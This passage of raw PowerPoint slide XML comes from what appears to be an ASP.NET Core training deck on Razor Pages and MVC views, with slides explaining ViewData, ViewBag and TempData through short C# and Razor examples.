              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057298" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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indent="0" algn="ctr" fontAlgn="auto">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Create.cshtml.cs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418278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8325233-2521-47A9-823E-BA6107926316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo: Razor Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02AE2BB-8DE5-451B-B5E3-CEBC477DDDBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448800" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249581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Module 4: Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>View Fundamentals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Passing Data to Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1586152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ViewData</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Represents a container to pass data from a Controller to View and vice versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ViewData </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exposes an instance of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ViewDataDictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data passed from Controller to View using ViewData</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Red"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data accessed from View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ViewData [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"color"</a:t>
            </a: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559421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ViewBag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Represents a dynamic wrapper around ViewData</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-225425">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewBag.Color</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ViewBag only works with valid C# identifiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-225425"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Car Color"</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"Red"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-225425"/>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ViewBag.Car</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> Color;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ViewBag dynamic value cannot be used in extension methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-225425">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Html.TextBox(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, ViewBag.Color);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-225425">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>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Html.TextBox(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" strike="sngStrike"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2328969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TempData</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" noProof="0" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passing data between the current and next HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data passed from Controller to View using TempData</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TempData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Red"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data accessed from View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@TempData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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"color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TempData object could yield results differently than expected because the next request origin cannot be guaranteed!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="700100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5257800"/>
            <a:ext cx="11480800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="243829" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F">
                    <a:alpha val="87000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Active Directory, Azure, IntelliSense, Internet Explorer, Microsoft, Microsoft Corporate Logo, Silverlight, SharePoint, SQL Server, Visual Basic, Visual Studio, Windows, Windows Server, and Windows Vista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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F">
                  <a:alpha val="87000"/>
                </a:srgb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76955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020E7-0E1D-4CC8-B91E-CD4A060C035E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TempData</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F514DEC2-92EC-4FBA-8CB7-E038A0849437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624D3199-04D5-457C-83D3-263B5601F9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, message is stored</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in TempData, but it is not available </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
